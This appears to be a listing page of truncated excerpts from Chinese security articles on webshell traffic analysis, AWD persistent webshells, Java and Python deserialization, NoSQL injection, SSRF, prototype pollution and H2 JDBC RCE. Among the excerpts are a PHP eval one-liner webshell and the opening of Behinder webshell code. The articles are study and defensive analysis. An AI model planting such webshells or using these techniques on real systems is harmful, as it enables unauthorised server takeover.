前言 随着生成式人工智能的发展,越来越多的AI应用开始走进我们的生活和工作,想必大家有被ChatGPT的强大震撼到。 除了ChatGPT,各类开源或闭源的大模型也蓬勃发展,各个公司也开始使用这类模型结合自己的数据来进行训练,制作一个专有的“ChatGPT”。例如:客服机器人,内部知识库问答,商业数据分析,代码助手等等。 但是这种大语言模型(LLM)也会存在一定的安全问题,本篇文章将会展开讲讲这些安
哥斯拉流量分析 这是webshell流量分析哥斯拉篇 check流量 当下的分析会建立php5.3使用evalXOR解码器 当点击测试连接他会发送返回三组包 第一个包 第二个包 第三个包 其实第一个特征已经出来了,不难看出在PHP_EVAL_XOR_BASE64这个加密器的情况下,哥斯拉会将他的完整shell通过密码参数传入服务器,且每个包都会 解码 在一句话木马的情况下,哥斯拉4.0.
这是webshell系列工具分析的冰蝎篇 @error_reporting(0); // 关闭错误报告,这样任何错误都不会显示给用户 session_start(); // 开始一个新会话或恢复现有会话 $key="e45e329feb5d925b"; // 定义一个密钥,用于加密和解密 $_SESSION['k']=$key; // 将密钥存储在会话变量中rebeyond session_wri
前言:在AWD中php不死马对于维持权限来说十分good,不过为了更好的学习php不死马的原理当然要在本地实验一番来,但在本地实验的过程中遇到了小插曲,php不死马在成功上传服务器后却在几分钟后烟消云散了,在网上搜索却找不到相关文献,好在经过一阵分析从日志文件中找到了原因。 正文: 问题描述:在通过预置的一句话木马使用webshell管理工具(这里以蚁剑为例),进行上传不死马,上传成功后删除不死马
所用到的类java原生类和common-collections类 jdk版本是 jdk1.8.0_162 看到之前师傅总结的cc链子的图,我去使用CodeQL寻找了一下,发现除了Map,List也能触发。 我找了一个可以触发到transform的链子,剩下的作用如InvokerTransform触发二次反序列化没有写,这边使用ChainedTransformer做一个例子 调用链: 分析 ev
参考文章: https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html https://exp10it.io/2024/02/hessian-utf-8-overlong-encoding/ 在java反序列化中,readUTF函数存在对三个字节进行转换成字符串 我们可以将敏感字节,从一个字节转换成三个字节,原理可以参考
前言 2024年3月,安全公司 Fastly发布了一项调查报告,报告显示95%的企业在过去1年中遇到过 API 安全问题。本文参照OWASP API Security Top 10,结合金融行业业务特点和java开发技术栈,介绍API面临的安全漏洞问题,同时从开发设计层面提供API安全漏洞的防范指南。 1、防范敏感信息泄漏 信息安全三要素是机密性、完整性、可用性,机密性往往是最重要的。金融业务需要
0x00 前言 程序介绍: 前台一键发布图文,视频,音乐。发布内容支持定位或自定义位置信息。支持将发布内容设为广告模式消息站内通知或邮件通知。支持其他用户注册,支持其他用户发布文章,管理自己的文章。拥有丰富的后台管理功能,一键操作。 目录结构: 0x01 前台任意文件上传 需要普通用户权限(可直接注册),在/api/uploadavatar.php 头像更新处,move_uploaded_fi
简述NoSQL注入 简介 NoSQL数据存储由于其可扩展性和易用性,最近几年变得越来越受欢迎,但是伴随着NoSQL数据库的兴起,安全问题也伴随着呈现。新的查询语法将传统的SQL注入方法语句将不再适用,本文将讨论几种NoSQL注入方式以及其数据库的安全风险。 主要从如下四个方面进行说明 php array injection attack(php数据注入攻击) MongoDB OR
蚁剑流量分析 在靶机上面上传一个一句话木马,并使用蚁剑连接,进行抓包, 一句话木马内容 <?php @eval($_POST[1]); defalut编码器 在使用蚁剑连接的时候使用default编码器 连接之后进行的操作行为是查看当前目录(/var/www/html)下的文件,抓取到的流量内容如下: 对此进行解码并格式化 1=@ini_set("display_errors", "0
文章前言 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞,产生的原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制,常见的一个场景就是通过用户输入的URL来获取图片,此功能如果被恶意使用就可以用存在缺陷的Web应用作为代理攻击远程和本地的服务器,本篇文章我能主要对SSRF的
前言 JSON语法: var object = { 'a': [{ 'b': 2 }, { 'd': 4 }] }; var other = { 'a': [{ 'c': 3 }, { 'e': 5 }] }; _.merge(object, other); // => { 'a': [{ 'b': 2, 'c': 3 }, { 'd': 4, 'e': 5 }] } 原型链继
pickle反序列化 简介 pickle是Python的一个库,可以对一个对象进行序列化和反序列化操作.其中__reduce__魔法函数会在一个对象被反序列化时自动执行,我们可以通过在__reduce__魔法函数内植入恶意代码的方式进行任意命令执行.通常会利用到Python的反弹shell. 前置知识 python对象 在python中,对象的概念十分广泛. 对象是数据和功能的结合体。Python
前言 看了下之前没打出来的CTF题目心血来潮来复现学习下,刚好遇到新的链子,就一并记录下,标题很洋气,从CTF中学习Vaadin gadgets Vaadin链 Vaadin 可以理解为是一个平台吧,有UI,了解即可,Vaadin 的反序列化调用链其实蛮简单的,就是反射调用 getter 方法罢了 依赖 vaadin-server : 7.7.14 vaadin-shared : 7.7.14
前言 JDBC的路漫漫,之前只学过mysql的JDBC RCE,趁此机会补一下 H2 RCE H2数据库是之前不怎么见到过的一款数据库,之前都不清楚可以RCE,但从最近爆出的MetaBase 2023 的CVE来看还是挺重要的,所以趁着这个机会给他一起学一下。 INIT RunScript RCE 在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE,并且有很多利用,首先就是